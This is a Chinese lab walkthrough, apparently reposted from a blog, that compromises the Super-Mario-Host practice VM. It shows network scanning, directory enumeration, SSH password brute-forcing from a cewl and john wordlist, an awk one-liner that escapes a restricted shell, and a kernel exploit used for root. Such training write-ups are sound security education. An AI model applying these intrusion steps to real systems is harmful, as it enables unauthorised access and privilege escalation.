kali渗透综合靶机(七)--Super-Mario-Host靶机

kali渗透综合靶机(七)--Super-Mario-Host靶机

靶机百度云下载  链接:https://pan.baidu.com/s/13l1FUgJjXArfoTOfcmPsbA 提取码:a8ox

一、主机发现

1.netdiscover -i eth0 -r 192.168.10.0/24

  kali渗透综合靶机(七)--Super-Mario-Host靶机_第1张图片

二、端口扫描

1. masscan --rate=10000 -p0-65535 192.168.10.160

  kali渗透综合靶机(七)--Super-Mario-Host靶机_第2张图片

三、端口服务识别

1.nmap -sV -T4 -O 192.168.10.160 -p 22,80

  kali渗透综合靶机(七)--Super-Mario-Host靶机_第3张图片

四、漏洞发现与利用

1.扫描网站目录

Dirb http://192.168.10.161:8180

  kali渗透综合靶机(七)--Super-Mario-Host靶机_第4张图片

2.发现http://192.168.10.161:8180/vhosts

  kali渗透综合靶机(七)--Super-Mario-Host靶机_第5张图片

3. 在本地hosts文件添加解析记录

  

4.浏览器访问http://mario.supermariohost.local:8180/,别的什么都没有

  

5. 使用dirbuster扫描目录,扫描出来如下目录

  kali渗透综合靶机(七)--Super-Mario-Host靶机_第6张图片

6. 发现http://mario.supermariohost.local:8180/luigi.php

  

7. 发现http://mario.supermariohost.local:8180/command.php  测试luigi,发现存在

  kali渗透综合靶机(七)--Super-Mario-Host靶机_第7张图片

8.使用cewl爬取站点下的可疑用户名作为用户名字典

cewl http://mario.supermariohost.local:8180/ -d -w /root/user.txt

9. john在该user的基础上生成相应社工密码进行爆破

john --wordlist=user.txt --stdout --rules > passwd.txt

10.爆破出密码,使用ssh登录,发现是受限的shell,使用awk调用系统命令,绕过限制

awk ‘BEGIN{system(“/bin/bash”)}’

  kali渗透综合靶机(七)--Super-Mario-Host靶机_第8张图片

11.查看内核版本,然后再kali使用searchsploit查找是否有exp

  kali渗透综合靶机(七)--Super-Mario-Host靶机_第9张图片

12.开始提权,成功获得管理员权限

  kali渗透综合靶机(七)--Super-Mario-Host靶机_第10张图片

 

总结:

1.信息收集

2.dirbuster、dirb扫描目录

3.测试用户是否存在

4.使用cewl爬取站点下的可疑用户名作为用户名字典

5.john在该user的基础上生成相应社工密码进行爆破

6.受用awk调用系统命令绕过受限的shell

7.利用内核版本漏洞本地提权

转载于:https://www.cnblogs.com/yuzly/p/10801308.html

你可能感兴趣的:(awk,shell,php)